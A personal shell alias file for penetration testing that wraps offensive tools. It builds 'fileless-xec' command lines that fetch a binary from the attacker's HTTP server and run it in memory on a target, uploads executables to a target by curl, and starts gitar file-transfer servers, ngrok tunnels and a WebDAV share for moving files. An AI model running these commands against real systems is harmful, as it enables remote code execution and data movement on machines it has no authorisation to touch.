# personnal shortcuts
# 'source' it before making pentest

alias cpy='xclip -selection clipboard'

## Queensono send

## Queensono send cpy

## Queensono receive

## Queensono receive cpy

## Fileless-xec as client (Launch a server and copy line to launch on target)
bang.flx.client.cpy(){
if [ "$1" = "-h" ]; then
    echo "bang.flx.client.cpy \$AA \$AP [BINARY_NAME]"
else
    echo "fileless-xec http://$1:$2/$3" | cpy && echo "Command line copied to clipboard (launch it on target machine)" && python3 -m http.server $2 
fi
}

## Fileless-xec server cpy
bang.flx.serve.cpy(){
if [ "$1" = "-h" ]; then
    echo "bang.flx.serve.cpy \$AP"
else
    echo "fileless-xec server $1"|cpy  && echo "Command line copied to clipboard (launch it on target machine)"
fi
}

## Fileless-xec send to server
bang.flx.send(){
if [ "$1" = "-h" ]; then
    echo "bang.flx.send \$TA \$TP [file]"
else
    curl -X POST -F "executable=@$3" http://$1:$2/upload
fi
}

## Gitar start
bang.gitar(){
if [ "$1" = "-h" ]; then
    echo "bang.gitar \$AA"
else
  gitar -e $1
fi
}

## "Safe" Gitar start
bang.gitar.safe(){
if [ "$1" = "-h" ]; then
    echo "bang.gitar.safe \$AA"
else
  docker run --rm --cap-drop=all --cap-add=dac_override -v "${PWD}:/app/upload" -v "${HOME}/.gitar/certs/:/certs:ro" -v "${PWD}:/app/download" -p 9237:9237 gitar -copy=false -u /app/upload -d /app/download -tls=true -c /certs -e $1
fi
}

## Gitar start + url override
bang.gitar.override(){
if [ "$1" = "-h" ]; then
    echo "bang.gitar.override [PROXY_URL]"
else
  gitar -alias-override-url=$1
fi
}

## "Safe" Gitar start + url override
bang.gitar.safe-override(){
if [ "$1" = "-h" ]; then
    echo "ban.gitar.safe-override [PROXY_URL]"
else
  docker run --rm --cap-drop=all --cap-add=dac_override -v "${PWD}:/app/upload" -v "${HOME}/.gitar/certs/:/certs:ro" -v "${PWD}:/app/download" -p 9237:9237 gitar -copy=false -u /app/upload -d /app/download -tls=true -c /certs -alias-override-url=$1
fi
}

## Gitar server as a daemon 
bang.gitar.daemon(){
if [ "$1" = "-h" ]; then
    echo "bang.gitar.daemon \$AA"
else
  nohup gitar -e $1 &
fi
}

## Kill gitar process
bang.gitar.kill(){
if [ "$1" = "-h" ]; then
    echo "bang.gitar.kill"
else
  sudo kill -9 $(pgrep gitar)
fi
}

## Ngrok expose a https service
bang.expose.https(){
if [ "$1" = "-h" ]; then
    echo "bang.expose-https \$AP"
else
  ngrok http https://127.0.0.1:$1
fi
}

## Ngrok expose a port
bang.expose(){
if [ "$1" = "-h" ]; then
    echo "bang.expose \$AP"
else
  ngrok http $1
fi
}

alias bang.webdavhere='docker run --rm -it -p 8080:80 -v "${PWD}:/srv/data/share" rflathers/webdav'
